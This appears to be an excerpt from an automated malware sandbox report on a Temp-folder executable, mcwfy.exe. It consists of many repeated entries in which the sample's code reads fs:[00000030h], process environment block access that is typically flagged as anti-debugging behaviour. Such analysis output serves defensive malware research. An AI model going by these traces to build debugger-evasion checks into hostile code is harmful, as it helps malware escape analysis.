Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE1074 mov eax, dword ptr fs:[00000030h] 3_2_00BE1074
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD2073 mov eax, dword ptr fs:[00000030h] 3_2_00BD2073
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B30050 mov eax, dword ptr fs:[00000030h] 3_2_00B30050
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B30050 mov eax, dword ptr fs:[00000030h] 3_2_00B30050
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h] 3_2_00B951BE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h] 3_2_00B951BE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h] 3_2_00B951BE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B951BE mov eax, dword ptr fs:[00000030h] 3_2_00B951BE
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov ecx, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B399BF mov eax, dword ptr fs:[00000030h] 3_2_00B399BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B461A0 mov eax, dword ptr fs:[00000030h] 3_2_00B461A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B461A0 mov eax, dword ptr fs:[00000030h] 3_2_00B461A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h] 3_2_00BD49A4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h] 3_2_00BD49A4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h] 3_2_00BD49A4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD49A4 mov eax, dword ptr fs:[00000030h] 3_2_00BD49A4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B969A6 mov eax, dword ptr fs:[00000030h] 3_2_00B969A6
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42990 mov eax, dword ptr fs:[00000030h] 3_2_00B42990
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A185 mov eax, dword ptr fs:[00000030h] 3_2_00B4A185
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3C182 mov eax, dword ptr fs:[00000030h] 3_2_00B3C182
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00B1B1E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00B1B1E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00B1B1E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BA41E8 mov eax, dword ptr fs:[00000030h] 3_2_00BA41E8
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4513A mov eax, dword ptr fs:[00000030h] 3_2_00B4513A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4513A mov eax, dword ptr fs:[00000030h] 3_2_00B4513A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h] 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h] 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h] 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 mov eax, dword ptr fs:[00000030h] 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B34120 mov ecx, dword ptr fs:[00000030h] 3_2_00B34120
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h] 3_2_00B19100
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h] 3_2_00B19100
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19100 mov eax, dword ptr fs:[00000030h] 3_2_00B19100
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1B171 mov eax, dword ptr fs:[00000030h] 3_2_00B1B171
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1B171 mov eax, dword ptr fs:[00000030h] 3_2_00B1B171
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1C962 mov eax, dword ptr fs:[00000030h] 3_2_00B1C962
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B944 mov eax, dword ptr fs:[00000030h] 3_2_00B3B944
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B944 mov eax, dword ptr fs:[00000030h] 3_2_00B3B944
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00B2AAB0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00B2AAB0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00B4FAB0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h] 3_2_00B152A5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h] 3_2_00B152A5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h] 3_2_00B152A5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h] 3_2_00B152A5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B152A5 mov eax, dword ptr fs:[00000030h] 3_2_00B152A5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4D294 mov eax, dword ptr fs:[00000030h] 3_2_00B4D294
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4D294 mov eax, dword ptr fs:[00000030h] 3_2_00B4D294
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42AE4 mov eax, dword ptr fs:[00000030h] 3_2_00B42AE4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42ACB mov eax, dword ptr fs:[00000030h] 3_2_00B42ACB
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B54A2C mov eax, dword ptr fs:[00000030h] 3_2_00B54A2C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B54A2C mov eax, dword ptr fs:[00000030h] 3_2_00B54A2C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A229 mov eax, dword ptr fs:[00000030h] 3_2_00B3A229
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h] 3_2_00B15210
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B15210 mov ecx, dword ptr fs:[00000030h] 3_2_00B15210
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h] 3_2_00B15210
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B15210 mov eax, dword ptr fs:[00000030h] 3_2_00B15210
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h] 3_2_00B1AA16
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h] 3_2_00B1AA16
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDAA16 mov eax, dword ptr fs:[00000030h] 3_2_00BDAA16
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDAA16 mov eax, dword ptr fs:[00000030h] 3_2_00BDAA16
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B33A1C mov eax, dword ptr fs:[00000030h] 3_2_00B33A1C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B28A0A mov eax, dword ptr fs:[00000030h] 3_2_00B28A0A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5927A mov eax, dword ptr fs:[00000030h] 3_2_00B5927A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCB260 mov eax, dword ptr fs:[00000030h] 3_2_00BCB260
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCB260 mov eax, dword ptr fs:[00000030h] 3_2_00BCB260
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8A62 mov eax, dword ptr fs:[00000030h] 3_2_00BE8A62
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDEA55 mov eax, dword ptr fs:[00000030h] 3_2_00BDEA55
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BA4257 mov eax, dword ptr fs:[00000030h] 3_2_00BA4257
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h] 3_2_00B19240
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h] 3_2_00B19240
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h] 3_2_00B19240
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19240 mov eax, dword ptr fs:[00000030h] 3_2_00B19240
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h] 3_2_00B44BAD
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h] 3_2_00B44BAD
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B44BAD mov eax, dword ptr fs:[00000030h] 3_2_00B44BAD
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00BE5BA5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42397 mov eax, dword ptr fs:[00000030h] 3_2_00B42397
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4B390 mov eax, dword ptr fs:[00000030h] 3_2_00B4B390
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD138A mov eax, dword ptr fs:[00000030h] 3_2_00BD138A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BCD380 mov ecx, dword ptr fs:[00000030h] 3_2_00BCD380
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B21B8F mov eax, dword ptr fs:[00000030h] 3_2_00B21B8F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B21B8F mov eax, dword ptr fs:[00000030h] 3_2_00B21B8F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h] 3_2_00B403E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h] 3_2_00B403E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h] 3_2_00B403E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h] 3_2_00B403E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h] 3_2_00B403E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B403E2 mov eax, dword ptr fs:[00000030h] 3_2_00B403E2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00B3DBE9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B953CA mov eax, dword ptr fs:[00000030h] 3_2_00B953CA
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B953CA mov eax, dword ptr fs:[00000030h] 3_2_00B953CA
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD131B mov eax, dword ptr fs:[00000030h] 3_2_00BD131B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B43B7A mov eax, dword ptr fs:[00000030h] 3_2_00B43B7A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B43B7A mov eax, dword ptr fs:[00000030h] 3_2_00B43B7A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1DB60 mov ecx, dword ptr fs:[00000030h] 3_2_00B1DB60
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8B58 mov eax, dword ptr fs:[00000030h] 3_2_00BE8B58
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1F358 mov eax, dword ptr fs:[00000030h] 3_2_00B1F358
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1DB40 mov eax, dword ptr fs:[00000030h] 3_2_00B1DB40
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2849B mov eax, dword ptr fs:[00000030h] 3_2_00B2849B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD14FB mov eax, dword ptr fs:[00000030h] 3_2_00BD14FB
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B96CF0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B96CF0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B96CF0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00BE8CD6
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4BC2C mov eax, dword ptr fs:[00000030h] 3_2_00B4BC2C
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h] 3_2_00BE740D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h] 3_2_00BE740D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE740D mov eax, dword ptr fs:[00000030h] 3_2_00BE740D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h] 3_2_00B96C0A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h] 3_2_00B96C0A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h] 3_2_00B96C0A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96C0A mov eax, dword ptr fs:[00000030h] 3_2_00B96C0A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00BD1C06
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3746D mov eax, dword ptr fs:[00000030h] 3_2_00B3746D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAC450 mov eax, dword ptr fs:[00000030h] 3_2_00BAC450
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAC450 mov eax, dword ptr fs:[00000030h] 3_2_00BAC450
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4A44B mov eax, dword ptr fs:[00000030h] 3_2_00B4A44B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00B41DB5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00B41DB5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00B41DB5
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE05AC mov eax, dword ptr fs:[00000030h] 3_2_00BE05AC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE05AC mov eax, dword ptr fs:[00000030h] 3_2_00BE05AC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B435A1 mov eax, dword ptr fs:[00000030h] 3_2_00B435A1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4FD9B mov eax, dword ptr fs:[00000030h] 3_2_00B4FD9B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4FD9B mov eax, dword ptr fs:[00000030h] 3_2_00B4FD9B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h] 3_2_00B42581
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h] 3_2_00B42581
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h] 3_2_00B42581
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B42581 mov eax, dword ptr fs:[00000030h] 3_2_00B42581
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h] 3_2_00B12D8A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h] 3_2_00B12D8A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h] 3_2_00B12D8A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h] 3_2_00B12D8A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B12D8A mov eax, dword ptr fs:[00000030h] 3_2_00B12D8A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BC8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00BC8DF1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00B2D5E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00B2D5E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00BDFDE2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00BDFDE2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00BDFDE2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00BDFDE2
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B96DC9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B96DC9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B96DC9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00B96DC9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B96DC9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B96DC9
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B1AD30 mov eax, dword ptr fs:[00000030h] 3_2_00B1AD30
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDE539 mov eax, dword ptr fs:[00000030h] 3_2_00BDE539
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B23D34 mov eax, dword ptr fs:[00000030h] 3_2_00B23D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE8D34 mov eax, dword ptr fs:[00000030h] 3_2_00BE8D34
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B9A537 mov eax, dword ptr fs:[00000030h] 3_2_00B9A537
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B44D3B mov eax, dword ptr fs:[00000030h] 3_2_00B44D3B
